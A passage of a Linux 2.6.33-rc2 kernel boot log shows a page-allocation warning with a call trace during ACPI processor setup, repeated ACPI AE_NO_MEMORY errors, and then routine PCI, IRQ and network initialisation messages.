DpgPmm P008Ist 00000012 INTL 20060113) [ 1.630020] ------------[ cut here ]------------ [ 1.630026] WARNING: at mm/page_alloc.c:1812 __alloc_pages_nodemask+0x617/0x730() [ 1.630028] Hardware name: System Product Name [ 1.630029] Modules linked in: [ 1.630032] Pid: 1, comm: swapper Not tainted 2.6.33-rc2 #4 [ 1.630034] Call Trace: [ 1.630038] [&lt;ffffffff810532a8&gt;] warn_slowpath_common+0x78/0xb0 [ 1.630041] [&lt;ffffffff810532ef&gt;] warn_slowpath_null+0xf/0x20 [ 1.630044] [&lt;ffffffff810e65a7&gt;] __alloc_pages_nodemask+0x617/0x730 [ 1.630048] [&lt;ffffffff81114d14&gt;] alloc_page_interleave+0x34/0x90 [ 1.630050] [&lt;ffffffff81115444&gt;] alloc_pages_current+0xc4/0xd0 [ 1.630053] [&lt;ffffffff810e5549&gt;] __get_free_pages+0x9/0x50 [ 1.630055] [&lt;ffffffff8111ef3b&gt;] __kmalloc+0x1bb/0x1f0 [ 1.630059] [&lt;ffffffff81089bdd&gt;] ? trace_hardirqs_on+0xd/0x10 [ 1.630064] [&lt;ffffffff812cae3e&gt;] acpi_os_allocate+0x25/0x27 [ 1.630067] [&lt;ffffffff812cafab&gt;] acpi_ex_load_op+0xd8/0x260 [ 1.630070] [&lt;ffffffff812cd89e&gt;] acpi_ex_opcode_1A_1T_0R+0x25/0x4b [ 1.630073] [&lt;ffffffff812c5008&gt;] acpi_ds_exec_end_op+0xea/0x3d6 [ 1.630076] [&lt;ffffffff812d7532&gt;] acpi_ps_parse_loop+0x7d9/0x95f [ 1.630079] [&lt;ffffffff812c58cf&gt;] ? acpi_ds_call_control_method+0x166/0x1d7 [ 1.630082] [&lt;ffffffff812d6641&gt;] acpi_ps_parse_aml+0x9a/0x2b9 [ 1.630085] [&lt;ffffffff812d7d3a&gt;] acpi_ps_execute_method+0x1c8/0x29a [ 1.630088] [&lt;ffffffff812d2f4d&gt;] acpi_ns_evaluate+0xe1/0x1a8 [ 1.630090] [&lt;ffffffff812d29a1&gt;] acpi_evaluate_object+0xf9/0x1f2 [ 1.630094] [&lt;ffffffff812bda07&gt;] acpi_processor_set_pdc+0x1be/0x1e8 [ 1.630097] [&lt;ffffffff812bda3a&gt;] early_init_pdc+0x9/0xf [ 1.630100] [&lt;ffffffff812d4a96&gt;] acpi_ns_walk_namespace+0xb9/0x187 [ 1.630102] [&lt;ffffffff812bda31&gt;] ? early_init_pdc+0x0/0xf [ 1.630105] [&lt;ffffffff812bda31&gt;] ? early_init_pdc+0x0/0xf [ 1.630108] [&lt;ffffffff812d27e0&gt;] acpi_walk_namespace+0x85/0xbf [ 1.630111] [&lt;ffffffff81cc7da9&gt;] ? acpi_init+0x0/0x12f [ 1.630113] [&lt;ffffffff81cc7da9&gt;] ? acpi_init+0x0/0x12f [ 1.630116] [&lt;ffffffff812bd7c6&gt;] acpi_early_processor_set_pdc+0x3a/0x3c [ 1.630119] [&lt;ffffffff81cc7c80&gt;] acpi_bus_init+0xb5/0x1de [ 1.630123] [&lt;ffffffff8128239e&gt;] ? kobject_create_and_add+0x3e/0x80 [ 1.630126] [&lt;ffffffff81cc2f0c&gt;] ? genhd_device_init+0x0/0x7b [ 1.630128] [&lt;ffffffff81cc7da9&gt;] ? acpi_init+0x0/0x12f [ 1.630131] [&lt;ffffffff81cc7e1a&gt;] acpi_init+0x71/0x12f [ 1.630134] [&lt;ffffffff81002047&gt;] do_one_initcall+0x37/0x1a0 [ 1.630137] [&lt;ffffffff81ca1731&gt;] kernel_init+0x166/0x1bc [ 1.630140] [&lt;ffffffff8100a3e4&gt;] kernel_thread_helper+0x4/0x10 [ 1.630144] [&lt;ffffffff814f95d0&gt;] ? restore_args+0x0/0x30 [ 1.630147] [&lt;ffffffff81ca15cb&gt;] ? kernel_init+0x0/0x1bc [ 1.630149] [&lt;ffffffff8100a3e0&gt;] ? kernel_thread_helper+0x0/0x10 [ 1.630156] ---[ end trace f17e946d22a56015 ]--- [ 1.630159] ACPI Error (psparse-0537): Method parse/execution failed [\_PR_.P009._OSC] (Node ffff8801b9069c20), AE_NO_MEMORY [ 1.630196] ACPI Error (psparse-0537): Method parse/execution failed [\_PR_.P009._PDC] (Node ffff8801b9069c00), AE_NO_MEMORY [ 1.630676] ACPI Error (psparse-0537): Method parse/execution failed [\_PR_.P010._OSC] (Node ffff8801b9069ca0), AE_NO_MEMORY [ 1.630712] ACPI Error (psparse-0537): Method parse/execution failed [\_PR_.P010._PDC] (Node ffff8801b9069c80), AE_NO_MEMORY [ 1.631186] ACPI Error (psparse-0537): Method parse/execution failed [\_PR_.P011._OSC] (Node ffff8801b9069d20), AE_NO_MEMORY [ 1.631222] ACPI Error (psparse-0537): Method parse/execution failed [\_PR_.P011._PDC] (Node ffff8801b9069d00), AE_NO_MEMORY [ 1.631697] ACPI Error (psparse-0537): Method parse/execution failed [\_PR_.P012._OSC] (Node ffff8801b9069da0), AE_NO_MEMORY [ 1.631732] ACPI Error (psparse-0537): Method parse/execution failed [\_PR_.P012._PDC] (Node ffff8801b9069d80), AE_NO_MEMORY [ 1.632206] ACPI Error (psparse-0537): Method parse/execution failed [\_PR_.P013._OSC] (Node ffff8801b9069e20), AE_NO_MEMORY [ 1.632242] ACPI Error (psparse-0537): Method parse/execution failed [\_PR_.P013._PDC] (Node ffff8801b9069e00), AE_NO_MEMORY [ 1.632716] ACPI Error (psparse-0537): Method parse/execution failed [\_PR_.P014._OSC] (Node ffff8801b9069ea0), AE_NO_MEMORY [ 1.632752] ACPI Error (psparse-0537): Method parse/execution failed [\_PR_.P014._PDC] (Node ffff8801b9069e80), AE_NO_MEMORY [ 1.633226] ACPI Error (psparse-0537): Method parse/execution failed [\_PR_.P015._OSC] (Node ffff8801b9069f20), AE_NO_MEMORY [ 1.633262] ACPI Error (psparse-0537): Method parse/execution failed [\_PR_.P015._PDC] (Node ffff8801b9069f00), AE_NO_MEMORY [ 1.633739] ACPI Error (psparse-0537): Method parse/execution failed [\_PR_.P016._OSC] (Node ffff8801b9069fa0), AE_NO_MEMORY [ 1.633774] ACPI Error (psparse-0537): Method parse/execution failed [\_PR_.P016._PDC] (Node ffff8801b9069f80), AE_NO_MEMORY [ 1.633828] ACPI: Interpreter enabled [ 1.633831] ACPI: (supports S0 S1 S3 S5) [ 1.633872] ACPI: Using IOAPIC for interrupt routing [ 1.633932] PCI: MMCONFIG for domain 0000 [bus 00-ff] at [mem 0xe0000000-0xefffffff] (base 0xe0000000) [ 1.636927] PCI: MMCONFIG at [mem 0xe0000000-0xefffffff] reserved in ACPI motherboard resources [ 1.673962] ACPI: No dock devices found. [ 1.674132] ACPI: PCI Root Bridge [PCI0] (0000:00) [ 1.674240] pci_root PNP0A08:00: ignoring host bridge windows from ACPI; boot with "pci=use_crs" to use them [ 1.674530] pci_root PNP0A08:00: host bridge window [io 0x0000-0x0cf7] (ignored) [ 1.674533] pci_root PNP0A08:00: host bridge window [io 0x0d00-0xffff] (ignored) [ 1.674535] pci_root PNP0A08:00: host bridge window [mem 0x000a0000-0x000bffff] (ignored) [ 1.674537] pci_root PNP0A08:00: host bridge window [mem 0x000d0000-0x000dffff] (ignored) [ 1.674539] pci_root PNP0A08:00: host bridge window [mem 0xc0000000-0xdfffffff] (ignored) [ 1.674541] pci_root PNP0A08:00: host bridge window [mem 0xf0000000-0xfed8ffff] (ignored) [ 1.674657] pci 0000:00:00.0: PME# supported from D0 D3hot D3cold [ 1.674662] pci 0000:00:00.0: PME# disabled [ 1.674755] pci 0000:00:01.0: PME# supported from D0 D3hot D3cold [ 1.674759] pci 0000:00:01.0: PME# disabled [ 1.674852] pci 0000:00:03.0: PME# supported from D0 D3hot D3cold [ 1.674856] pci 0000:00:03.0: PME# disabled [ 1.674954] pci 0000:00:07.0: PME# supported from D0 D3hot D3cold [ 1.674958] pci 0000:00:07.0: PME# disabled [ 1.675016] IOH bus: [00, fb] [ 1.675018] IOH bus: 00 index 0 io port: [0, efff] [ 1.675020] IOH bus: 00 index 1 mmio: [d0000000, fbffffff] [ 1.675342] pci 0000:00:1a.0: reg 20: [io 0x7800-0x781f] [ 1.675435] pci 0000:00:1a.1: reg 20: [io 0x7880-0x789f] [ 1.675526] pci 0000:00:1a.2: reg 20: [io 0x7c00-0x7c1f] [ 1.675619] pci 0000:00:1a.7: reg 10: [mem 0xfb7ff000-0xfb7ff3ff] [ 1.675694] pci 0000:00:1a.7: PME# supported from D0 D3hot D3cold [ 1.675699] pci 0000:00:1a.7: PME# disabled [ 1.675746] pci 0000:00:1b.0: reg 10: [mem 0xfb7f8000-0xfb7fbfff 64bit] [ 1.675806] pci 0000:00:1b.0: PME# supported from D0 D3hot D3cold [ 1.675810] pci 0000:00:1b.0: PME# disabled [ 1.675905] pci 0000:00:1c.0: PME# supported from D0 D3hot D3cold [ 1.675909] pci 0000:00:1c.0: PME# disabled [ 1.676011] pci 0000:00:1c.2: PME# supported from D0 D3hot D3cold [ 1.676015] pci 0000:00:1c.2: PME# disabled [ 1.676113] pci 0000:00:1c.3: PME# supported from D0 D3hot D3cold [ 1.676117] pci 0000:00:1c.3: PME# disabled [ 1.676214] pci 0000:00:1c.4: PME# supported from D0 D3hot D3cold [ 1.676218] pci 0000:00:1c.4: PME# disabled [ 1.676315] pci 0000:00:1c.5: PME# supported from D0 D3hot D3cold [ 1.676319] pci 0000:00:1c.5: PME# disabled [ 1.676392] pci 0000:00:1d.0: reg 20: [io 0x7080-0x709f] [ 1.676484] pci 0000:00:1d.1: reg 20: [io 0x7400-0x741f] [ 1.676576] pci 0000:00:1d.2: reg 20: [io 0x7480-0x749f] [ 1.676669] pci 0000:00:1d.7: reg 10: [mem 0xfb7fe000-0xfb7fe3ff] [ 1.676744] pci 0000:00:1d.7: PME# supported from D0 D3hot D3cold [ 1.676749] pci 0000:00:1d.7: PME# disabled [ 1.676908] pci 0000:00:1f.0: quirk: [io 0x0800-0x087f] claimed by ICH6 ACPI/GPIO/TCO [ 1.676912] pci 0000:00:1f.0: quirk: [io 0x0500-0x053f] claimed by ICH6 GPIO [ 1.676916] pci 0000:00:1f.0: ICH7 LPC Generic IO decode 1 PIO at 0294 (mask 0003) [ 1.676922] pci 0000:00:1f.0: ICH7 LPC Generic IO decode 3 PIO at 4700 (mask 001f) [ 1.676988] pci 0000:00:1f.2: reg 10: [io 0x6000-0x6007] [ 1.676995] pci 0000:00:1f.2: reg 14: [io 0x5c00-0x5c03] [ 1.677002] pci 0000:00:1f.2: reg 18: [io 0x5880-0x5887] [ 1.677009] pci 0000:00:1f.2: reg 1c: [io 0x5800-0x5803] [ 1.677016] pci 0000:00:1f.2: reg 20: [io 0x5480-0x548f] [ 1.677023] pci 0000:00:1f.2: reg 24: [io 0x5400-0x540f] [ 1.677089] pci 0000:00:1f.3: reg 10: [mem 0xfb7fd000-0xfb7fd0ff 64bit] [ 1.677108] pci 0000:00:1f.3: reg 20: [io 0x0400-0x041f] [ 1.677164] pci 0000:00:1f.5: reg 10: [io 0x7000-0x7007] [ 1.677171] pci 0000:00:1f.5: reg 14: [io 0x6c00-0x6c03] [ 1.677178] pci 0000:00:1f.5: reg 18: [io 0x6880-0x6887] [ 1.677185] pci 0000:00:1f.5: reg 1c: [io 0x6800-0x6803] [ 1.677192] pci 0000:00:1f.5: reg 20: [io 0x6480-0x648f] [ 1.677199] pci 0000:00:1f.5: reg 24: [io 0x6400-0x640f] [ 1.677246] PCI: peer root bus 00 res updated from pci conf [ 1.677298] pci 0000:01:00.0: reg 10: [mem 0xfb8fc000-0xfb8fffff 64bit] [ 1.677307] pci 0000:01:00.0: reg 18: [io 0x8800-0x88ff] [ 1.677334] pci 0000:01:00.0: reg 30: [mem 0xfb8c0000-0xfb8dffff pref] [ 1.677378] pci 0000:01:00.0: supports D1 D2 [ 1.677379] pci 0000:01:00.0: PME# supported from D0 D1 D2 D3hot D3cold [ 1.677384] pci 0000:01:00.0: PME# disabled [ 1.677458] pci 0000:00:01.0: PCI bridge to [bus 01-01] [ 1.677462] pci 0000:00:01.0: bridge window [io 0x8000-0x8fff] [ 1.677467] pci 0000:00:01.0: bridge window [mem 0xfb800000-0xfb8fffff] [ 1.677509] pci 0000:02:00.0: reg 10: [mem 0xd0000000-0xdfffffff 64bit pref] [ 1.677521] pci 0000:02:00.0: reg 18: [mem 0xfb9e0000-0xfb9effff 64bit] [ 1.677528] pci 0000:02:00.0: reg 20: [io 0x9000-0x90ff] [ 1.677540] pci 0000:02:00.0: reg 30: [mem 0xfb9c0000-0xfb9dffff pref] [ 1.677567] pci 0000:02:00.0: supports D1 D2 [ 1.677607] pci 0000:02:00.1: reg 10: [mem 0xfb9f0000-0xfb9fffff 64bit] [ 1.677656] pci 0000:02:00.1: supports D1 D2 [ 1.677737] pci 0000:00:03.0: PCI bridge to [bus 02-02] [ 1.677742] pci 0000:00:03.0: bridge window [io 0x9000-0x9fff] [ 1.677746] pci 0000:00:03.0: bridge window [mem 0xfb900000-0xfb9fffff] [ 1.677753] pci 0000:00:03.0: bridge window [mem 0xd0000000-0xdfffffff 64bit pref] [ 1.677794] pci 0000:03:00.0: reg 10: [mem 0xfba80000-0xfba9ffff] [ 1.677802] pci 0000:03:00.0: reg 14: [mem 0xfba60000-0xfba7ffff] [ 1.677810] pci 0000:03:00.0: reg 18: [io 0xa880-0xa89f] [ 1.677836] pci 0000:03:00.0: reg 30: [mem 0xfba40000-0xfba5ffff pref] [ 1.677871] pci 0000:03:00.0: PME# supported from D0 D3hot D3cold [ 1.677875] pci 0000:03:00.0: PME# disabled [ 1.677924] pci 0000:03:00.1: reg 10: [mem 0xfbae0000-0xfbafffff] [ 1.677932] pci 0000:03:00.1: reg 14: [mem 0xfbac0000-0xfbadffff] [ 1.677939] pci 0000:03:00.1: reg 18: [io 0xac00-0xac1f] [ 1.677965] pci 0000:03:00.1: reg 30: [mem 0xfbaa0000-0xfbabffff pref] [ 1.678000] pci 0000:03:00.1: PME# supported from D0 D3hot D3cold [ 1.678005] pci 0000:03:00.1: PME# disabled [ 1.678093] pci 0000:00:07.0: PCI bridge to [bus 03-03] [ 1.678097] pci 0000:00:07.0: bridge window [io 0xa000-0xafff] [ 1.678102] pci 0000:00:07.0: bridge window [mem 0xfba00000-0xfbafffff] [ 1.678189] pci 0000:00:1c.0: PCI bridge to [bus 08-08] [ 1.678202] pci 0000:00:1c.0: bridge window [mem 0xfaf00000-0xfaffffff 64bit pref] [ 1.678262] pci 0000:07:00.0: reg 10: [mem 0xfbefc000-0xfbefffff 64bit] [ 1.678271] pci 0000:07:00.0: reg 18: [io 0xe800-0xe8ff] [ 1.678304] pci 0000:07:00.0: reg 30: [mem 0xfbec0000-0xfbedffff pref] [ 1.678355] pci 0000:07:00.0: supports D1 D2 [ 1.678357] pci 0000:07:00.0: PME# supported from D0 D1 D2 D3hot D3cold [ 1.678362] pci 0000:07:00.0: PME# disabled [ 1.678453] pci 0000:00:1c.2: PCI bridge to [bus 07-07] [ 1.678458] pci 0000:00:1c.2: bridge window [io 0xe000-0xefff] [ 1.678462] pci 0000:00:1c.2: bridge window [mem 0xfbe00000-0xfbefffff] [ 1.678532] pci 0000:06:00.0: reg 18: [io 0xdc00-0xdc7f] [ 1.678558] pci 0000:06:00.0: reg 20: [mem 0xfbdff000-0xfbdfffff 64bit] [ 1.678568] pci 0000:06:00.0: reg 30: [mem 0xfbd80000-0xfbdbffff pref] [ 1.678611] pci 0000:06:00.0: supports D1 [ 1.678612] pci 0000:06:00.0: PME# supported from D0 D1 D3hot [ 1.678618] pci 0000:06:00.0: PME# disabled [ 1.678708] pci 0000:00:1c.3: PCI bridge to [bus 06-06] [ 1.678712] pci 0000:00:1c.3: bridge window [io 0xd000-0xdfff] [ 1.678717] pci 0000:00:1c.3: bridge window [mem 0xfbd00000-0xfbdfffff] [ 1.678770] pci 0000:05:00.0: reg 10: [io 0xcc00-0xcc07] [ 1.678779] pci 0000:05:00.0: reg 14: [io 0xc880-0xc883] [ 1.678788] pci 0000:05:00.0: reg 18: [io 0xc800-0xc807] [ 1.678798] pci 0000:05:00.0: reg 1c: [io 0xc480-0xc483] [ 1.678807] pci 0000:05:00.0: reg 20: [io 0xc400-0xc40f] [ 1.678816] pci 0000:05:00.0: reg 24: [mem 0xfbcffc00-0xfbcfffff] [ 1.678868] pci 0000:05:00.0: supports D1 [ 1.678870] pci 0000:05:00.0: PME# supported from D0 D1 D3hot [ 1.678875] pci 0000:05:00.0: PME# disabled [ 1.678965] pci 0000:00:1c.4: PCI bridge to [bus 05-05] [ 1.678969] pci 0000:00:1c.4: bridge window [io 0xc000-0xcfff] [ 1.678974] pci 0000:00:1c.4: bridge window [mem 0xfbc00000-0xfbcfffff] [ 1.679039] pci 0000:04:00.0: reg 10: [mem 0xfbbfc000-0xfbbfffff 64bit] [ 1.679049] pci 0000:04:00.0: reg 18: [io 0xb800-0xb8ff] [ 1.679081] pci 0000:04:00.0: reg 30: [mem 0xfbbc0000-0xfbbdffff pref] [ 1.679133] pci 0000:04:00.0: supports D1 D2 [ 1.679134] pci 0000:04:00.0: PME# supported from D0 D1 D2 D3hot D3cold [ 1.679140] pci 0000:04:00.0: PME# disabled [ 1.679225] pci 0000:00:1c.5: PCI bridge to [bus 04-04] [ 1.679229] pci 0000:00:1c.5: bridge window [io 0xb000-0xbfff] [ 1.679234] pci 0000:00:1c.5: bridge window [mem 0xfbb00000-0xfbbfffff] [ 1.679332] pci 0000:00:1e.0: PCI bridge to [bus 09-09] (subtractive decode) [ 1.679398] ACPI: PCI Interrupt Routing Table [\_SB_.PCI0._PRT] [ 1.679869] ACPI: PCI Interrupt Routing Table [\_SB_.PCI0.P0P1._PRT] [ 1.680057] ACPI: PCI Interrupt Routing Table [\_SB_.PCI0.P0P4._PRT] [ 1.680137] ACPI: PCI Interrupt Routing Table [\_SB_.PCI0.P0P6._PRT] [ 1.680210] ACPI: PCI Interrupt Routing Table [\_SB_.PCI0.P0P7._PRT] [ 1.680282] ACPI: PCI Interrupt Routing Table [\_SB_.PCI0.P0P8._PRT] [ 1.680355] ACPI: PCI Interrupt Routing Table [\_SB_.PCI0.P0P9._PRT] [ 1.680427] ACPI: PCI Interrupt Routing Table [\_SB_.PCI0.NPE1._PRT] [ 1.680498] ACPI: PCI Interrupt Routing Table [\_SB_.PCI0.NPE3._PRT] [ 1.680570] ACPI: PCI Interrupt Routing Table [\_SB_.PCI0.NPE7._PRT] [ 1.726626] ACPI: PCI Interrupt Link [LNKA] (IRQs 3 4 6 7 *10 11 12 14 15) [ 1.726770] ACPI: PCI Interrupt Link [LNKB] (IRQs *5) [ 1.726907] ACPI: PCI Interrupt Link [LNKC] (IRQs 3 4 6 7 10 11 12 14 *15) [ 1.727048] ACPI: PCI Interrupt Link [LNKD] (IRQs 3 4 6 7 10 *11 12 14 15) [ 1.727190] ACPI: PCI Interrupt Link [LNKE] (IRQs 3 4 6 7 10 11 12 *14 15) [ 1.727331] ACPI: PCI Interrupt Link [LNKF] (IRQs *3 4 6 7 10 11 12 14 15) [ 1.727471] ACPI: PCI Interrupt Link [LNKG] (IRQs 3 4 6 *7 10 11 12 14 15) [ 1.727612] ACPI: PCI Interrupt Link [LNKH] (IRQs 3 *4 6 7 10 11 12 14 15) [ 1.727913] vgaarb: device added: PCI:0000:02:00.0,decodes=io+mem,owns=io+mem,locks=none [ 1.727928] vgaarb: loaded [ 1.728086] SCSI subsystem initialized [ 1.728336] libata version 3.00 loaded. [ 1.728465] usbcore: registered new interface driver usbfs [ 1.728489] usbcore: registered new interface driver hub [ 1.728527] usbcore: registered new device driver usb [ 1.728805] ACPI: WMI: Mapper loaded [ 1.728807] PCI: Using ACPI for IRQ routing [ 1.728809] PCI: pci_cache_line_size set to 64 bytes [ 1.729376] NetLabel: Initializing [ 1.729377] NetLabel: domain hash size = 128 [ 1.729379] NetLabel: protocols = UNLABELED CIPSOv4 [ 1.729420] NetLabel: unlabeled traffic allowed by default [ 1.729425] HPET: 4 timers in total, 0 timers will be used for per-cpu timer [ 1.729430] hpet0: at MMIO 0xfed00000, IRQs 2, 8, 0, 0 [ 1.729435] hpet0: 4 comparators, 64-bit 14.318180 MHz counter [ 1.788481] Switching to clocksource tsc [ 1.794860] pnp: PnP ACPI init [ 1.794885] ACPI: bus type pnp registered [ 1.799315] pnp: PnP ACPI: found 15 devices [ 1.799319] ACPI: ACPI bus type pnp unregistered [ 1.799333] system 00:01: [mem 0xfbf00000-0xfbffffff] has been reserved [ 1.799335] system 00:01: [mem 0xfc000000-0xfcffffff] has been reserved [ 1.799338] system 00:01: [mem 0xfd000000-0xfdffffff] has been reserved [ 1.799340] system 00:01: [mem 0xfe000000-0xfebfffff] has been reserved [ 1.799343] system 00:01: [mem 0xfec8a000-0xfec8afff] could not be reserved [ 1.799346] system 00:01: [mem 0xfed10000-0xfed10fff] has been reserved [ 1.799358] system 00:07: [io 0x0290-0x029f] has been reserved [ 1.799367] system 00:08: [io 0x04d0-0x04d1] has been reserved [ 1.799369] system 00:08: [io 0x0800-0x087f] has been reserved [ 1.799372] system 00:08: [io 0x0500-0x057f] could not be reserved [ 1.799375] system 00:08: [mem 0xfed1c000-0xfed1ffff] has been reserved [ 1.799380] system 00:08: [mem 0xfed20000-0xfed3ffff] has been reserved [ 1.799383] system 00:08: [mem 0xfed40000-0xfed8ffff] has been reserved [ 1.799393] system 00:0b: [mem 0xffc00000-0xffdfffff] has been reserved [ 1.799402] system 00:0c: [mem 0xfec00000-0xfec00fff] could not be reserved [ 1.799404] system 00:0c: [mem 0xfee00000-0xfee00fff] has been reserved [ 1.799413] system 00:0d: [mem 0xe0000000-0xefffffff] has been reserved [ 1.799422] system 00:0e: [mem 0x00000000-0x0009ffff] could not be reserved [ 1.799425] system 00:0e: [mem 0x000c0000-0x000cffff] has been reserved [ 1.799427] system 00:0e: [mem 0x000e0000-0x000fffff] could not be reserved [ 1.799430] system 00:0e: [mem 0x00100000-0xbfffffff] could not be reserved [ 1.799433] system 00:0e: [mem 0xfed90000-0xffffffff] could not be reserved [ 1.804318] pci 0000:00:1c.0: BAR 14: assigned [mem 0xf0000000-0xf03fffff] [ 1.804321] pci 0000:00:1c.2: BAR 15: assigned [mem 0xf0400000-0xf05fffff 64bit pref] [ 1.804324] pci 0000:00:1c.3: BAR 15: assigned [mem 0xf0600000-0xf07fffff 64bit pref] [ 1.804327] pci 0000:00:1c.4: BAR 15: assigned [mem 0xf0800000-0xf09fffff 64bit pref] [ 1.804329] pci 0000:00:1c.5: BAR 15: assigned [mem 0xf0a00000-0xf0bfffff 64bit pref] [ 1.804332] pci 0000:00:1c.0: BAR 13: assigned [io 0x1000-0x1fff] [ 1.804334] pci 0000:00:01.0: PCI bridge to [bus 01-01] [ 1.804338] pci 0000:00:01.0: bridge window [io 0x8000-0x8fff] [ 1.804343] pci 0000:00:01.0: bridge window [mem 0xfb800000-0xfb8fffff] [ 1.804347] pci 0000:00:01.0: bridge window [mem pref disabled] [ 1.804354] pci 0000:00:03.0: PCI bridge to [bus 02-02] [ 1.804357] pci 0000:00:03.0: bridge window [io 0x9000-0x9fff] [ 1.804362] pci 0000:00:03.0: bridge window [mem 0xfb900000-0xfb9fffff] [ 1.804367] pci 0000:00:03.0: bridge window [mem 0xd0000000-0xdfffffff 64bit pref] [ 1.804374] pci 0000:00:07.0: PCI bridge to [bus 03-03] [ 1.804377] pci 0000:00:07.0: bridge window [io 0xa000-0xafff] [ 1.804382] pci 0000:00:07.0: bridge window [mem 0xfba00000-0xfbafffff] [ 1.804386] pci 0000:00:07.0: bridge window [mem pref disabled] [ 1.804393] pci 0000:00:1c.0: PCI bridge to [bus 08-08] [ 1.804396] pci 0000:00:1c.0: bridge window [io 0x1000-0x1fff] [ 1.804401] pci 0000:00:1c.0: bridge window [mem 0xf0000000-0xf03fffff] [ 1.804406] pci 0000:00:1c.0: bridge window [mem 0xfaf00000-0xfaffffff 64bit pref] [ 1.804413] pci 0000:00:1c.2: PCI bridge to [bus 07-07] [ 1.804416] pci 0000:00:1c.2: bridge window [io 0xe000-0xefff] [ 1.804422] pci 0000:00:1c.2: bridge window [mem 0xfbe00000-0xfbefffff] [ 1.804427] pci 0000:00:1c.2: bridge window [mem 0xf0400000-0xf05fffff 64bit pref] [ 1.804434] pci 0000:00:1c.3: PCI bridge to [bus 06-06] [ 1.804437] pci 0000:00:1c.3: bridge window [io 0xd000-0xdfff] [ 1.804443] pci 0000:00:1c.3: bridge window [mem 0xfbd00000-0xfbdfffff] [ 1.804447] pci 0000:00:1c.3: bridge window [mem 0xf0600000-0xf07fffff 64bit pref] [ 1.804455] pci 0000:00:1c.4: PCI bridge to [bus 05-05] [ 1.804458] pci 0000:00:1c.4: bridge window [io 0xc000-0xcfff] [ 1.804464] pci 0000:00:1c.4: bridge window [mem 0xfbc00000-0xfbcfffff] [ 1.804468] pci 0000:00:1c.4: bridge window [mem 0xf0800000-0xf09fffff 64bit pref] [ 1.804475] pci 0000:00:1c.5: PCI bridge to [bus 04-04] [ 1.804478] pci 0000:00:1c.5: bridge window [io 0xb000-0xbfff] [ 1.804484] pci 0000:00:1c.5: bridge window [mem 0xfbb00000-0xfbbfffff] [ 1.804489] pci 0000:00:1c.5: bridge window [mem 0xf0a00000-0xf0bfffff 64bit pref] [ 1.804496] pci 0000:00:1e.0: PCI bridge to [bus 09-09] [ 1.804497] pci 0000:00:1e.0: bridge window [io disabled] [ 1.804503] pci 0000:00:1e.0: bridge window [mem disabled] [ 1.804507] pci 0000:00:1e.0: bridge window [mem pref disabled] [ 1.804524] pci 0000:00:01.0: setting latency timer to 64 [ 1.804536] pci 0000:00:03.0: setting latency timer to 64 [ 1.804547] pci 0000:00:07.0: setting latency timer to 64 [ 1.804556] pci 0000:00:1c.0: enabling device (0106 -&gt; 0107) [ 1.804568] alloc irq_desc for 17 on node -1 [ 1.804570] alloc kstat_irqs on node -1 [ 1.804576] pci 0000:00:1c.0: PCI INT A -&gt; GSI 17 (level, low) -&gt; IRQ 17 [ 1.804581] pci 0000:00:1c.0: setting latency timer to 64 [ 1.804591] alloc irq_desc for 18 on node -1 [ 1.804592] alloc kstat_irqs on node -1 [ 1.804597] pci 0000:00:1c.2: PCI INT C -&gt; GSI 18 (level, low) -&gt; IRQ 18 [ 1.804601] pci 0000:00:1c.2: setting latency timer to 64 [ 1.804611] alloc irq_desc for 19 on node -1 [ 1.804613] alloc kstat_irqs on node -1 [ 1.804617] pci 0000:00:1c.3: PCI INT D -&gt; GSI 19 (level, low) -&gt; IRQ 19 [ 1.804622] pci 0000:00:1c.3: setting latency timer to 64 [ 1.804632] pci 0000:00:1c.4: PCI INT A -&gt; GSI 17 (level, low) -&gt; IRQ 17 [ 1.804637] pci 0000:00:1c.4: setting latency timer to 64 [ 1.804646] alloc irq_desc for 16 on node -1 [ 1.804648] alloc kstat_irqs on node -1 [ 1.804652] pci 0000:00:1c.5: PCI INT B -&gt; GSI 16 (level, low) -&gt; IRQ 16 [ 1.804657] pci 0000:00:1c.5: setting latency timer to 64 [ 1.804665] pci 0000:00:1e.0: setting latency timer to 64 [ 1.804668] pci_bus 0000:00: resource 0 [io 0x0000-0xefff] [ 1.804670] pci_bus 0000:00: resource 1 [mem 0xd0000000-0xfbffffff] [ 1.804672] pci_bus 0000:01: resource 0 [io 0x8000-0x8fff] [ 1.804674] pci_bus 0000:01: resource 1 [mem 0xfb800000-0xfb8fffff] [ 1.804676] pci_bus 0000:02: resource 0 [io 0x9000-0x9fff] [ 1.804677] pci_bus 0000:02: resource 1 [mem 0xfb900000-0xfb9fffff] [ 1.804679] pci_bus 0000:02: resource 2 [mem 0xd0000000-0xdfffffff 64bit pref] [ 1.804681] pci_bus 0000:03: resource 0 [io 0xa000-0xafff] [ 1.804683] pci_bus 0000:03: resource 1 [mem 0xfba00000-0xfbafffff] [ 1.804685] pci_bus 0000:08: resource 0 [io 0x1000-0x1fff] [ 1.804687] pci_bus 0000:08: resource 1 [mem 0xf0000000-0xf03fffff] [ 1.804689] pci_bus 0000:08: resource 2 [mem 0xfaf00000-0xfaffffff 64bit pref] [ 1.804691] pci_bus 0000:07: resource 0 [io 0xe000-0xefff] [ 1.804692] pci_bus 0000:07: resource 1 [mem 0xfbe00000-0xfbefffff] [ 1.804694] pci_bus 0000:07: resource 2 [mem 0xf0400000-0xf05fffff 64bit pref] [ 1.804696] pci_bus 0000:06: resource 0 [io 0xd000-0xdfff] [ 1.804698] pci_bus 0000:06: resource 1 [mem 0xfbd00000-0xfbdfffff] [ 1.804700] pci_bus 0000:06: resource 2 [mem 0xf0600000-0xf07fffff 64bit pref] [ 1.804702] pci_bus 0000:05: resource 0 [io 0xc000-0xcfff] [ 1.804703] pci_bus 0000:05: resource 1 [mem 0xfbc00000-0xfbcfffff] [ 1.804705] pci_bus 0000:05: resource 2 [mem 0xf0800000-0xf09fffff 64bit pref] [ 1.804707] pci_bus 0000:04: resource 0 [io 0xb000-0xbfff] [ 1.804709] pci_bus 0000:04: resource 1 [mem 0xfbb00000-0xfbbfffff] [ 1.804711] pci_bus 0000:04: resource 2 [mem 0xf0a00000-0xf0bfffff 64bit pref] [ 1.804713] pci_bus 0000:09: resource 3 [io 0x0000-0xefff] [ 1.804714] pci_bus 0000:09: resource 4 [mem 0xd0000000-0xfbffffff] [ 1.804768] NET: Registered protocol family 2 [ 1.805082] IP route cache hash table entries: 262144 (order: 9, 2097152 bytes) [ 1.806440] TCP established hash table entries: 524288 (order: 11, 8388608 bytes) [ 1.807980] TCP bind hash table entries: 65536 (order: 10, 4718592 bytes) [ 1.812117] TCP: Hash tables configured (established 524288 bind 65536) [ 1.812138] TCP reno registered [ 1.812189] UDP hash table entries: 4096 (order: 7, 655360 bytes) [ 